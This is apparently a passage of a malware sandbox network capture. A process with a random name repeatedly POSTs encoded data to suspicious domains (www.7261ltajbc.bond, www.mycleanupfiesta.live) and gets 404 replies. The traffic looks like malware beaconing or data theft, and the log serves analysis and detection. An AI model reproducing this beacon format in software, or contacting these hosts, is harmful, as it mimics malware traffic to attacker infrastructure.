Jan 11, 2025 09:23:48.178983927 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 08:23:48 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	50003	154.12.28.184	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:49.853689909 CET	750	OUT	POST /m36v/ HTTP/1.1 Host: www.7261ltajbc.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.7261ltajbc.bond Referer: http://www.7261ltajbc.bond/m36v/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 50 48 4d 67 64 42 72 31 50 2f 4f 33 73 31 74 34 58 4f 34 48 76 63 75 71 7a 71 53 48 57 77 6c 46 48 4f 65 57 74 6f 6f 4c 53 6c 75 55 34 65 76 73 56 4a 74 69 65 54 59 45 59 51 6a 6e 56 35 46 44 71 61 4b 2f 45 50 44 44 30 64 2f 51 56 75 34 35 77 35 45 78 4c 76 51 75 4c 38 51 68 75 67 41 45 41 6e 72 36 51 4e 73 31 4b 64 6a 44 38 52 39 78 5a 33 63 61 36 63 32 39 55 50 37 36 51 6f 5a 48 57 77 4a 66 77 45 33 41 48 70 76 53 38 2b 55 43 44 33 4a 67 75 38 6b 4c 38 73 47 6e 31 6b 6a 6e 49 58 5a 4b 6a 4f 7a 34 6b 31 71 51 53 6d 52 30 70 79 36 6c 6b 53 52 39 48 36 54 56 53 55 74 68 53 74 37 42 2b 71 66 52 65 49 45 70 55 5a 34 66 6e 64 55 35 6d 73 35 61 68 33 6e 45 Data Ascii: 3DkHhn=PHMgdBr1P/O3s1t4XO4HvcuqzqSHWwlFHOeWtooLSluU4evsVJtieTYEYQjnV5FDqaK/EPDD0d/QVu45w5ExLvQuL8QhugAEAnr6QNs1KdjD8R9xZ3ca6c29UP76QoZHWwJfwE3AHpvS8+UCD3Jgu8kL8sGn1kjnIXZKjOz4k1qQSmR0py6lkSR9H6TVSUthSt7B+qfReIEpUZ4fndU5ms5ah3nE
Jan 11, 2025 09:23:50.709671974 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 08:23:50 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	50004	154.12.28.184	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:52.676466942 CET	1767	OUT	POST /m36v/ HTTP/1.1 Host: www.7261ltajbc.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.7261ltajbc.bond Referer: http://www.7261ltajbc.bond/m36v/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 50 48 4d 67 64 42 72 31 50 2f 4f 33 73 31 74 34 58 4f 34 48 76 63 75 71 7a 71 53 48 57 77 6c 46 48 4f 65 57 74 6f 6f 4c 53 6c 57 55 34 73 58 73 55 75 5a 69 5a 54 59 45 45 67 6a 63 56 35 45 62 71 61 53 37 45 50 65 30 30 5a 50 51 55 4d 77 35 31 4d 77 78 46 76 51 75 55 4d 51 6b 71 67 41 52 41 6b 54 2b 51 4e 63 31 4b 64 6a 44 38 58 52 78 4f 31 34 61 32 38 33 50 54 50 37 75 64 49 5a 6a 57 30 6c 50 77 45 7a 36 48 35 50 53 38 65 45 43 4f 6b 68 67 6c 38 6b 4a 2f 73 47 2f 31 6b 66 4f 49 57 31 6f 6a 4f 58 43 6b 79 47 51 52 44 30 74 78 78 2b 47 34 78 31 34 4b 4b 54 50 55 56 4a 59 59 62 36 7a 6a 62 50 78 63 34 55 4b 43 49 34 2f 6b 61 46 49 77 59 42 71 74 6a 4b 73 5a 67 6f 4f 52 43 47 6f 69 6a 52 31 54 78 2b 42 33 4c 55 6a 35 44 33 70 54 33 42 50 78 42 59 38 5a 69 71 4b 33 69 32 59 6e 6b 67 70 57 30 45 6b 7a 59 66 2f 4c 46 50 61 4f 77 54 6d 2b 46 30 51 41 52 76 65 6f 2f 53 6c 34 6b 4f 67 43 47 48 4d 59 6f 6e 73 42 4f 2f 44 53 36 4c 52 57 4d 45 53 41 32 73 73 4a 6f 34 31 6c 65 6f 69 39 52 52 [TRUNCATED] Data Ascii: 3DkHhn=PHMgdBr1P/O3s1t4XO4HvcuqzqSHWwlFHOeWtooLSlWU4sXsUuZiZTYEEgjcV5EbqaS7EPe00ZPQUMw51MwxFvQuUMQkqgARAkT+QNc1KdjD8XRxO14a283PTP7udIZjW0lPwEz6H5PS8eECOkhgl8kJ/sG/1kfOIW1ojOXCkyGQRD0txx+G4x14KKTPUVJYYb6zjbPxc4UKCI4/kaFIwYBqtjKsZgoORCGoijR1Tx+B3LUj5D3pT3BPxBY8ZiqK3i2YnkgpW0EkzYf/LFPaOwTm+F0QARveo/Sl4kOgCGHMYonsBO/DS6LRWMESA2ssJo41leoi9RR8x3Pus2B51KX2WR/4+Tsr6ATko5Fu2KlYzJzWxVRleVT8PK8J1+WxqifeXR4pa8KwMll3bVg5wR/i8Wt3PMfcZhxANlvsJCHevb4vEDMaz7kLYhsXIcDmNBi5HBPJr2TwpTo0/DNJr/yFz8I5LYHr980DnBaAtkKeeJApE39g0boU5/KtHHsDq5jCWsOeB3Jkh90GJgUwm0Eo3chi4SQR1ggeaSfkN7PG2mrg3wSiJxpz4/oJEBNJGgyRHjTcBq4rRt/e7NchBsUC33y1ufram76SgYenmxI+U9C6pogLx8aHUorOJ4w/D63UZOdOtg41lz5UF0N5vsS7knYW30r9qDOm1DZSLuMZ1bsPX814jRL0g1qZGNDs3uqFHSyMpVTlLWKH+kk9/4IbgjPk+S/exab4vw6ETPB6SFjxIe7J39EfKj4DprqDqoloTkFoM06Z7Xd6A6xgKc3vB9Av+rNsYr8+ZTzd7Qs4So+mkgHFDYK6CQ8s97oODN2yWtAhwLSB/3jvCp0rvODCxC0KrlKbNdxXHOer4BGHyDVn23o9t99JwJBmXTKMBtQCir1RhG7OQIfJY7g0SDzmABpAOyY/7BbRB0PTLVZ9lMCPkZMjwRKD5Ay1X/I+2IKaLlV5G+LsWyaeg7Hng8am8egnNBxrw7syj4iaVXYMH [TRUNCATED]
Jan 11, 2025 09:23:53.486032963 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 08:23:53 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	50005	154.12.28.184	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:23:55.375621080 CET	467	OUT	GET /m36v/?3DkHhn=CFkAe3bFRt+WilFZUe5RqpuEyYe1T1ptTc7TrLcgXQSc7eL8d/sZYyILGDP2RZgGroaVNOLO4IzoQck32bc7MIdSPZAP+UMCVlLrdJlLVobFhTJLH0tY4N2Qcf3rQI4NHA==&jH4x=86JHl HTTP/1.1 Host: www.7261ltajbc.bond Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:23:56.216105938 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 08:23:56 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	50006	104.21.38.192	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:01.369858980 CET	745	OUT	POST /jhf5/ HTTP/1.1 Host: www.mycleanupfiesta.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.mycleanupfiesta.live Referer: http://www.mycleanupfiesta.live/jhf5/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 61 36 54 31 52 77 50 52 69 52 4f 74 6a 53 77 33 34 76 35 42 68 73 4c 67 31 4b 35 74 47 79 4a 4d 70 62 33 62 5a 43 6f 66 4c 4a 53 37 54 41 73 72 33 59 76 6d 58 2b 46 73 61 71 57 6d 47 50 6e 42 70 54 33 54 2f 53 67 63 71 64 38 56 73 33 30 6b 76 49 76 73 6b 61 4d 54 79 2f 56 30 6d 72 6e 78 67 50 47 65 4f 78 35 47 7a 64 32 39 42 53 58 64 6d 4c 32 50 52 38 73 4c 4a 37 63 36 72 58 39 44 47 48 39 72 45 56 79 39 43 55 74 64 33 4d 72 52 2b 6b 44 6d 74 61 6f 46 32 55 4b 4a 35 4c 4b 70 53 6e 64 4f 31 6d 48 78 4b 48 48 4b 43 32 2b 55 34 63 71 61 36 56 54 43 4f 6f 79 4c 34 59 70 46 6f 75 35 59 65 2f 73 3d Data Ascii: 3DkHhn=a6T1RwPRiROtjSw34v5BhsLg1K5tGyJMpb3bZCofLJS7TAsr3YvmX+FsaqWmGPnBpT3T/Sgcqd8Vs30kvIvskaMTy/V0mrnxgPGeOx5Gzd29BSXdmL2PR8sLJ7c6rX9DGH9rEVy9CUtd3MrR+kDmtaoF2UKJ5LKpSndO1mHxKHHKC2+U4cqa6VTCOoyL4YpFou5Ye/s=
Jan 11, 2025 09:24:01.976176023 CET	1016	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:24:01 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9PBmn6f2yqeS%2BsvTTgVgQL2rYBoeKqQMPOVOwhEjr25XGGY%2Fztyhc3EDFexFgLbcJahR4rR8ZhwBnPZYyLM6zcIThXPcNzsGs%2BKXHCiizB9CmU0ZQeXV%2BXzA3VnxdAetxBzz55Hh4R02rmI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90038212fa4743ff-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	50007	104.21.38.192	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:03.921864033 CET	765	OUT	POST /jhf5/ HTTP/1.1 Host: www.mycleanupfiesta.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.mycleanupfiesta.live Referer: http://www.mycleanupfiesta.live/jhf5/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 61 36 54 31 52 77 50 52 69 52 4f 74 68 79 41 33 2b 4d 52 42 31 38 4c 76 36 71 35 74 64 43 4a 49 70 62 37 62 5a 47 78 55 4b 37 47 37 54 6c 51 72 77 61 4c 6d 65 75 46 73 53 4b 57 6e 43 50 6e 77 70 54 4c 68 2f 58 59 63 71 62 51 56 73 31 38 6b 75 35 76 76 6d 4b 4d 52 73 66 56 32 37 62 6e 78 67 50 47 65 4f 78 73 72 7a 64 4f 39 43 6a 6e 64 6b 70 53 4d 4e 73 73 55 4f 37 63 36 68 33 38 72 47 48 38 4f 45 55 76 53 43 57 56 64 33 4f 7a 52 37 6d 72 68 6a 71 6f 44 79 55 4c 42 33 4b 6e 66 65 6d 73 74 6f 6d 6e 70 45 55 44 38 48 41 50 2b 69 2b 69 63 35 56 37 70 4f 72 61 39 39 76 30 74 79 4e 70 6f 41 6f 36 30 76 72 77 61 35 55 64 41 41 41 77 6d 37 66 72 56 53 4d 42 4a Data Ascii: 3DkHhn=a6T1RwPRiROthyA3+MRB18Lv6q5tdCJIpb7bZGxUK7G7TlQrwaLmeuFsSKWnCPnwpTLh/XYcqbQVs18ku5vvmKMRsfV27bnxgPGeOxsrzdO9CjndkpSMNssUO7c6h38rGH8OEUvSCWVd3OzR7mrhjqoDyULB3KnfemstomnpEUD8HAP+i+ic5V7pOra99v0tyNpoAo60vrwa5UdAAAwm7frVSMBJ
Jan 11, 2025 09:24:04.504182100 CET	1024	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:24:04 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXEi%2BBNOwffgRwqqrzGoqtH1eCthPfmuIfMDvdzal4rJX%2BNgbcrX5uJr8p%2B%2BaDRxf72rPGyNCEr%2Bl9m%2BuWrzamg6sumFMfS%2FuR1ibrSb1XUxiT3M3rmaI5B3D3N67QIho%2BNQ7SiNomyHCIk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90038222ed9ff5f8-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1450&min_rtt=1450&rtt_var=725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=120&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	50008	104.21.38.192	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:06.461751938 CET	1782	OUT	POST /jhf5/ HTTP/1.1 Host: www.mycleanupfiesta.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.mycleanupfiesta.live Referer: http://www.mycleanupfiesta.live/jhf5/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 61 36 54 31 52 77 50 52 69 52 4f 74 68 79 41 33 2b 4d 52 42 31 38 4c 76 36 71 35 74 64 43 4a 49 70 62 37 62 5a 47 78 55 4b 37 65 37 51 54 45 72 32 37 4c 6d 4d 2b 46 73 63 71 57 36 43 50 6e 58 70 54 69 6f 2f 57 6c 72 71 65 4d 56 74 58 45 6b 70 4c 58 76 73 4b 4d 52 32 2f 56 37 6d 72 6d 37 67 50 57 6b 4f 78 38 72 7a 64 4f 39 43 68 2f 64 71 72 32 4d 50 73 73 4c 4a 37 64 75 72 58 39 47 47 47 59 30 45 55 62 34 65 32 31 64 30 74 4c 52 38 46 44 68 6c 36 6f 42 2f 30 4c 77 33 4b 72 4d 65 6c 4a 65 6f 6d 54 54 45 55 37 38 48 33 53 7a 39 64 69 47 74 31 76 2b 42 62 79 71 38 2f 35 4d 39 62 74 70 4b 66 71 4b 67 63 70 7a 36 32 46 4a 43 41 78 69 69 62 66 53 51 36 67 31 70 37 62 43 47 45 65 36 6a 4a 46 47 6a 2f 75 2b 6a 71 39 4a 74 4b 6b 52 42 56 4f 5a 46 31 30 32 61 65 34 4c 6a 66 41 6a 46 65 42 6c 39 5a 6f 6a 36 79 46 56 53 34 65 76 79 6e 63 6c 6c 46 37 31 74 61 61 61 35 2b 77 49 72 33 4f 51 67 78 59 52 36 73 31 37 7a 71 54 76 67 55 70 51 6c 31 6b 70 63 7a 77 36 43 51 55 68 67 78 6b 39 4f 62 43 [TRUNCATED] Data Ascii: 3DkHhn=a6T1RwPRiROthyA3+MRB18Lv6q5tdCJIpb7bZGxUK7e7QTEr27LmM+FscqW6CPnXpTio/WlrqeMVtXEkpLXvsKMR2/V7mrm7gPWkOx8rzdO9Ch/dqr2MPssLJ7durX9GGGY0EUb4e21d0tLR8FDhl6oB/0Lw3KrMelJeomTTEU78H3Sz9diGt1v+Bbyq8/5M9btpKfqKgcpz62FJCAxiibfSQ6g1p7bCGEe6jJFGj/u+jq9JtKkRBVOZF102ae4LjfAjFeBl9Zoj6yFVS4evyncllF71taaa5+wIr3OQgxYR6s17zqTvgUpQl1kpczw6CQUhgxk9ObCsOvTjTVvbLNgh/pkdA2rqXUYHjE9K1NzA+gqJdOBwbDW+jm1R3CydTi/Pt2sZVNuX2IblLe981rwDt0QEs0PHvqYrgL99THENO9vtO5tRZI+svew+E5R1Ad6zoz3AyZIXR930aF6VNrHjbQd06PpfnEX1XpMD1YYLBn4RxurR7Ir6gjJvuTioWl6LFftGKpIuvw29FRcShqXv1b1wBmXVw7OA3GyDtDeDsdEUCs+rAc1ZOkMcHR9x9qfRVUq60taSVOxj6IeD3+ydpqb7ihb6HRpgWD6pUTt/gnbxQS8MRC0MA9n29e2j3N/IsRdSJg52TiUCZxfm1uIG/d7up61KN0L3fZTFT/+9W29+cXtsBraA2KQLyj8eu